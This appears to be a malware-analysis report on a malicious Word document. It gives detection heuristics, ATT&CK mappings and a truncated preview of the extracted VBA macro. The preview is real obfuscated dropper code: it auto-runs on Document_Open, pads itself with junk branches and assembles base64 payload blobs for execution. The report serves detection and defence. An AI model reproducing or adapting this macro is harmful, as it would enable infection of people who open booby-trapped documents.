MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macro, which is commonly used to execute downloaded payloads. The 'Document_Open' macro suggests automatic execution upon opening the document. The ClamAV detection name 'Doc.Dropper.Agent-6957340-0' further supports its nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6957340-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6957340-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20229 bytes |
SHA-256: 1afa3e86dac67787ee18735fb187f7727e9ddadbef614c2f9e8cdc71e7c9cb73 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() If 23 < 153 Then ' rRXLqb9k Else ' bYmjxqoM MsgBox "hOXmCz" End If If 41 * 20 = 1507 - 1492 Then UDRU1Pvc3 = "dy2NZ" End If RqwpncQ = 16007 HM13Kiqo = UDRU1Pvc3 & RqwpncQ Y9oX0 = "WTI5a2" n0KtjR = "FXNW5YVG82VlZSR09DNUhaWFJUZEhKcGJtY29XMU41YzNSbGJTNURiMjUyWlhKMFhUbzZSbkp2YlVKaGMyVTJORk4wY21sdV" iglhm3Cw5 = "p5Z2tZMjlrWlNrcE8zUnllWHRwWlhnb0pHSmhjMlUyTkNrN2ZXTmhkR05vZTNkeWFYUmxMV2h2YzNRZ0pGOHVaWGhqWlhCMGFXOXVMbTFsYzNOaFoyVTdmUT09" If 35 * 29 = 1075 - 1065 Then ufXhc = "zixAzX" End If JAeut41 = "hrLoeUN3E" mtKguQ = ufXhc & JAeut41 If 35 * 29 = 1075 - 1065 Then dRnwg = "Qs1642yHI" End If GjeTpk = 64585 GDKT8 = dRnwg & GjeTpk Dim ufE6w ufE6w = Y9oX0 & n0KtjR & iglhm3Cw5 Rb5makF = "Y0c5M1pYSnphR1ZzYkNBa1kyOWtaU0E5SUNkS1NFSm9aRWRuWjFCVFFXbE1hVFZqWTBoV01HUklhM1ZhV0doc1NXcHpaMHBJWkdwSlJEQm5ZbTFXTTB4WE9Xb" uCunYNe5U = "GhiVlpxWkVOQ2RWcFlVWFZrTWxacFdUSjRjRnBYTlRCUGVVRnJaREpOZFZwSE9UTmliWGgyV1ZkU2JXRlhlR3hMUTBwdlpFaFNkMDlwT0haa2JrNXlaVmRPZVZwWFJqQmhWemwxWTNrMWFtSXlNSFprV0VKcldWaFNiRmg2UlhWTlJFbDFXbGhvYkVscGQyZEtTRUpvWkVkbmNFOTVRbnBrUjBaNVpFTXhkMk50T1dwYVdFNTZTVU5TZDFsWVVtOVBkejA5Snpza1ltRnpaVFkwSUQwZ1cxTjVjM1JsYlM1VVpYaDBMa1Z1" If 26564 / 116 = -4805 + 4810 Then p0EwBQDZ = "tcKZuV" End If t3IhV4 = 37112 xz1enc7DS = p0EwBQDZ & t3IhV4 If 26564 / 116 = -4805 + 4810 Then Ld2mf = "NxN063" End If gJMq0U = "iM4cB" bbcOJS = Ld2mf & gJMq0U Dim fh3TI fh3TI = Rb5makF & uCunYNe5U Dim Ov3UReVm9 Ov3UReVm9 = 180 While Ov3UReVm9 <= 989 Ov3UReVm9 = Ov3UReVm9 + 28 Wend OoYHA = "OzvXsPFJR" Y9bwp = OdCwe & Ov3UReVm9 ALVd5iS = fh3TI & ufE6w If 60 < 249 Then ' hWFVJsi Else ' gG98HAFD MsgBox "U1z4jcw" End If If 60 < 249 Then ' XNnJ0R91 Else ' YIKvi MsgBox "B8mIakQ" End If If 557 + 42 = -3564 + 3573 Then L7abYJ3N = "SGwsvRTyl" End If b0e1l = 60970 MAkoK4 = L7abYJ3N & b0e1l If 913 + 8 = -887 + 901 Then VuxZ01 = "YJYhs8" End If bM6CLp95v = 49749 kKvs9dTm = VuxZ01 & bM6CLp95v If 913 + 8 = -887 + 901 Then ERXExK72 = "mZR6LTV23" End If qmydU = "KtNr2u" Jg57b1V = ERXExK72 & qmydU Call Stalin(ALVd5iS) End Sub Attribute VB_Name = "TetEf" Sub Stalin(BdEgBu6Y) If 625 - 4 = -1525 + 1538 Then RO271AKth = "WD89cpvsG" End If HtqbOSij0 = "k6ESx5kO2" R6H3rV = RO271AKth & HtqbOSij0 If 42 < 206 Then ' lItSB Else ' ySBPN1 Debug.Print "zPX0F" End If If 461 - 58 = 11352 / 946 Then R6Iig = "GTNMd4" End If f2Nguyp = 50341 ky4NuTEY = R6Iig & f2Nguyp If 53 < 137 Then ' ykeWRXFxP Else ' eoFVGPc Debug.Print "P7uG32NlT" End If If 46 < 165 Then ' h8mgoQR Else ' ZKqGOI MsgBox "W4ikW" End If If 24 < 183 Then ' QDWTqyxnw Else ' JqwL46P0 Debug.Print "af4aRe1" End If If 261 - 82 = 13656 / 2276 Then w8Kaw = "iv6Yjq" End If GPChQr0O = 29416 LBTmFA = w8Kaw & GPChQr0O If 20 < 252 Then ' DgnCd5pmG Else ' fqB2d3JVT Debug.Print "okNCZL3VA" End If If 39 < 170 Then ' abeKoC Else ' szMHy8j MsgBox "t4She5I" End If If 39 < 170 Then ' Iau6vFb Else ' it8wUgf MsgBox "Nydpu9S" End If Dim E2mFy E2mFy = 204 While E2mFy < 318 E2mFy = E2mFy + 32 Wend oDqofNGsA = 41355 kUNo4C = ykvJ4 & E2mFy If 16 < 245 Then ' q0lUO Else ' sQB3iAFSs Debug.Print "e5qLBS" End If If 31083 / 39 = 8752 / 1094 Then uedgxW = "JYxDtZ" End If XgPRF035 = 13544 BAqhC = uedgxW & XgPRF035 If 59 < 132 Then ' l1nKyY Else ' UBinp8QtC MsgBox "UiOvDnu" End If If 867 - 26 = -871 + 883 Then DIWc5kZ = "t1ylG8" End If iTVjB = "gafuUIP" rej3u7Qob = DIWc5kZ & iTVjB If -53 + 168 = 2414 - 2406 Then u5ghbJ = "cLYse63o9" End If xqF9w = 18288 OkeNCV = u5ghbJ & xqF9w Dim f98hZD f98hZD = 194 While f98hZD < 988 f98hZD = f98hZD + 58 Wend bAaUw = "UcSoh4" n3AbW0 = Nonw9pyA & f98hZD If 306 - 82 = 13986 / 999 Then B6k4XS = "ywHbW" End If mYnXd4Wlr = "cR6JvgZsh" e3Tutxm = B6k4XS & m ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.